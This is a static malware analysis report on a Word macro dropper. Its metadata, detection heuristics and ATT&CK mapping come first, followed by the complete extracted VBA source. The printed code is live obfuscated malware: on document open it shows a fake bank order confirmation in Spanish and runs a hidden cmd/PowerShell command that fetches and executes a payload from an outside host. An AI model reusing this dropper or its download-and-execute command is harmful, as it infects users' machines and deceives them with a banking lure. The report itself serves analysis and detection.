Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 326c75e6292209cd…

MALICIOUS

Office (OLE)

68.0 KB Created: 2016-12-01 21:45:00 Authoring application: Microsoft Office Word First seen: 2016-12-24
MD5: 4d5b72e8e4780c51d7ac596b1b0a988b SHA-1: a2af9ddfd817a793ab7a6feb2ce71396ba6a4591 SHA-256: 326c75e6292209cdfa6f62a5ced5faada0c4e20c997018b4e1889153ea4fc270
250 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.003 Windows Command Shell T1204.002 Malicious File T1071.001 Web Protocols

The file contains VBA macros, including a Document_Open auto-execution macro, which is designed to run code upon opening the document. Heuristics indicate the use of ShellExecute and cmd.exe, suggesting the macro's purpose is to download and execute a secondary payload. The ClamAV detection 'Doc.Dropper.Agent-1890089' further supports this dropper functionality.

Heuristics 8

  • ClamAV: Doc.Dropper.Agent-1890089 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-1890089
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    '8
Set objShelattackmedal = CreateObject("shell.application")
loadmountain = "q3kX4K9B.qGeGqxIGeGk'U)GU BG&KX k%GtImBGpK%k\UqARdBkokUvBkek6BB5G8U0" & huntone
  • cmd.exe reference in VBA high OLE_VBA_CMD
    cmd.exe reference in VBA
    Matched line in script
    dadnltkrvwjnlk = 225
objShelattackmedal.ShellExecute "cmd.exe", luivpnwmr, "", "open", 0
End If
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
Public Sub DoCUmeNT_oPEn()
qrklpjpljsnxxexkk = "affairuncle"
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3857 bytes
SHA-256: 46646f75f0c10f35e854141e878319cffbf48c780268d50e66341a69e8068c00
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Sub DoCUmeNT_oPEn()
qrklpjpljsnxxexkk = "affairuncle"
cipkxvudtrz = 670
'solvestairsbamboolunch
'684
Módulo1.fcvfzuilfsadr
End Sub


Attribute VB_Name = "Módulo1"
Public Function callchoose(attackmedal)
Dim bunkerrescue As Boolean
pclnkahnpufvtjnlac = ""
bunkerrescue = InStrRev("GBkRGKBXkkIqU", attackmedal)
'xsaagarzbfuqcboattool
'336
pvuyohdkklmmbv = "genresell"
dikzykbmkcxdcfayank = 944
If Not bunkerrescue Then
'tcjgqslanrlqbofuiomjzieknmnko
'706
pclnkahnpufvtjnlac = attackmedal
accountbest = "pdkuzbkmqozkhzfqye"
claydefense = 941
End If
callchoose = pclnkahnpufvtjnlac
'bundlereplacebuildtravel
'819
legunknown = "goddessmagnet"
ldeofxugzfvpcep = 552
End Function
Public Function terikxclfmxbiqjqnvg(stpclnkahnpufvtjnlac)
zmruitlbmhmuwlgtql = ""
'fantoembdfkpnlohlubu
'939
For sadnessvisit = 1 To Len(stpclnkahnpufvtjnlac)
'dsajzgynvqduhoqsnbrhybridpicture
'771
'frameplungeqleyjsumrez
'460
cautionfatigue = Mid(stpclnkahnpufvtjnlac, sadnessvisit, 1)
zmruitlbmhmuwlgtql = zmruitlbmhmuwlgtql & callchoose(cautionfatigue)
bidheight = "cablelife"
ohrytbhwjhefzv = 218
racksport = "fvwsyotyvuodedfpqk"
dcunplrfjnwpyvqsyz = 81
Next
'edzpjkvuanezovufbeginfoster
'333
cgjomikyg = "prvujcwtidkx"
sqpfkynwjynqmseuvwe = 658
terikxclfmxbiqjqnvg = zmruitlbmhmuwlgtql
'hvzfeyespzkjcapablecity
'715
'chaseskimistakeover
'886
End Function
Public Sub fcvfzuilfsadr()
'ccwvahiklsjxffyixpsdrnin
'243
obligeocean = "beanfragile"
burstnear = 849
labelthank = "oBRaUdkFkiXlkIeRR(qX'XRhBItBqtGRpq:G/RU/kdkKrkkyRvkkeUXrqGsIdqKoUcGkuBBmGeknGBtUskaknGBdqkcqkuGsGktIokmkR.GkcXokImGG/Rqjkk4IkvXk4BBukpGdBaUtR3kGsUR2X0q1K6BI.UReKxGkeI'kB,G'R%qqTkEkkMKPUq%GG\IARBdBKoBBvKeqB6G5q8K0G9"
crumblenose = "gubxywqzvnkzwzkjn"
fatherlabel = 507
huntone = "kI9k3kk4kX9GR.keUxUke"
ktqctcvxgnwlo = "nmzztzwxlkojce"
earthfun = 260
With ActiveDocument.InlineShapes
Do While .Count > 0
'fxcnxcyrnadmbspacevacuum
'366
.Item(1).Delete
'basickittenindustrywedding
'903
'benefittradeiaewopwzxftntynhoiu
'730
Loop
'inhalerelyanxietyweird
'105
pencilrepeat = "ifdaxzkuxlhwtyg"
zzzrmkloww = 501
End With
Selection.TypeText ("Estimado Cliente." & vbCrLf)
Selection.TypeText ("Su pedido ha sido verificado y aprobado por su banco. Conserve este número de folio para cualquier trámite como Cambios y Cancelaciones B098752sdf307." & vbCrLf)
'meshslimflymetal
'897
Selection.TypeText ("Puede Imprimir este documento para su referencia." & vbCrLf)
Selection.TypeText ("Institución de Banca Múltiple" & vbCrLf)
pjcvmifdjlpzga = "junkversion"
gptrryjcwc = 536
'coachtrafficmutualstay
'8
Set objShelattackmedal = CreateObject("shell.application")
loadmountain = "q3kX4K9B.qGeGqxIGeGk'U)GU BG&KX k%GtImBGpK%k\UqARdBkokUvBkek6BB5G8U0" & huntone
'vircxzyuvyyfjuewayjftfeyt
'384
luivpnwmr = "IcKmGdk.keXxkeG kB/BcU kGpqBoqIwGXekkrGkskRhkKeUKlGlk.BeGBxGeGR BG-BKwI GhkikdqkdGqeBInkk B-XnUoXGpUB XU-XkeBUpK XbGyqKpkaRqsqsq kG(INXeBwBB-GOKbIqjXeGcqtBB BSByBksGItBeXImXq.INkkekKtk.GWXekbkCKlkiIeRXnBBtB)XI.BDIoIBwIqnklq"
luivpnwmr = terikxclfmxbiqjqnvg(luivpnwmr & labelthank & loadmountain)
'joketrayavmdyiiozydb
'398
'bviqolxyfoobvwxvvwnwabxfggv
'686
If luivpnwmr <> labelthank Then
'absorbobservegupxnxktgscfrdo
'322
vqbgyazqh = "ugtjercoomx"
dadnltkrvwjnlk = 225
objShelattackmedal.ShellExecute "cmd.exe", luivpnwmr, "", "open", 0
End If
If huntone = labelthank Then
'jmgdwnmcuyfblouseunlock
'829
luivpnwmr = "kI9k3kk4kX9GR.keUxUke"
End If

fmcqvspqu = "buzzritual"
antennaeast = 472
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.